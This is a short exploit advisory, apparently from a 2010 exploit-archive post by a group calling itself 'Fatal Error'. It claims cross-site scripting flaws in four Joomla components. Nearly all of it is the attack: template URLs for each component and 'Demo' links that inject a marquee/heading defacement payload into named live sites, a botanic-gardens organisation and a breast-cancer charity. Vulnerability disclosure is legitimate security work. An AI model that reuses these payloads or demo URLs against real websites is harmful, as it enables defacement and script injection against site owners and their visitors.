The Joomla News, Article, Event and Content components suffer from a cross site scripting vulnerability.
41f97793662c56a8ce052e6f6d63fecd05e10a3e426e83e28a4770fda4adb609
[x] Joomla Component News
[x] Date: 14/05/2010
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component News
[x] Example: http://www.site.com/index.php?option=com_news=[XSS]
[x] Demo: http://www.bgci.org/index.php?option=com_news=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil
###########################################################################################################
[x] Joomla Component Article
[x] Date: 14/05/2010
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component Article
[x] Example: http://www.site.com/index.php?option=com_article=[XSS]
[x] Demo: http://www.bgci.org/index.php?option=com_article=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil
###########################################################################################################
[x] Joomla Component Content
[x] Date: 14/05/2010
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component Content
[x] Example: http://www.site.com/index.php?option=com_content=[XSS]
[x] Demo: http://www.bgci.org/index.php?option=com_content=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil
###########################################################################################################
[x] Joomla Component Event
[x] Date: 14/05/2010
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component Event
[x] Example: http://www.site.com/index.php?option=com_event=[XSS]
[x] Demo: http://www.breastcancercampaign.org/index.php?option=com_event=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil